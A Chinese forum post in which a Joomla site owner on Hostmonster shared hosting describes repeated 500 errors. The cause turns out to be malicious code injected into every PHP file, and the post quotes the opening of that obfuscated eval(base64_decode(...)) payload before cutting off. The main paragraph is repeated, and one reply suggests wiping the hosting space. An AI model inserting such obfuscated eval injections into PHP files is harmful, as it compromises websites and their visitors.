分享一段joomla网站被黑后修复的经历,也请高手指点迷津
背景
我用的空间是Hostmonster的,Hostmonster只提供共享主机,但是有24小时热线电话,控制面板的功能也比较多,所以一直使用Hostmonster的主机。 症状
我在Hostmonster 有两个帐号,大约一个多月前开始,这两个帐号同时出现了问题,页面打开就显示500错误。当时找不到问题所在,叫hostmonster的客服进行了全站恢复,恢复后没过几天两个帐号下属的网站又出现同样的500错误。再次全站恢复后没过几天又出现了同样的问题,经过仔细检查,发现两个帐号下的所有PHP文件总是在同一时间被更改,然后网站就出错。检查这些被更改后的PHP文件也没发现任何问题。再次打电话给hm的客服,他们说我们的服务器完全正常,没有任何被入侵的迹象,只好再次申请全站恢复备份。恢复后检查PHP文件,发现所有PHP文件的PHP标记中都被植入了一大段恶意代码:eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkV
我用的空间是Hostmonster的,Hostmonster只提供共享主机,但是有24小时热线电话,控制面板的功能也比较多,所以一直使用Hostmonster的主机。 症状
我在Hostmonster 有两个帐号,大约一个多月前开始,这两个帐号同时出现了问题,页面打开就显示500错误。当时找不到问题所在,叫hostmonster的客服进行了全站恢复,恢复后没过几天两个帐号下属的网站又出现同样的500错误。再次全站恢复后没过几天又出现了同样的问题,经过仔细检查,发现两个帐号下的所有PHP文件总是在同一时间被更改,然后网站就出错。检查这些被更改后的PHP文件也没发现任何问题。再次打电话给hm的客服,他们说我们的服务器完全正常,没有任何被入侵的迹象,只好再次申请全站恢复备份。恢复后检查PHP文件,发现所有PHP文件的PHP标记中都被植入了一大段恶意代码:eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkV
没有找到相关结果
已邀请:
1 个回复
3P网络 - 背着回忆的旅游人,即使是再细微的风景,也会留在心中的一个角落~
赞同来自:
搞不好要格式化空间了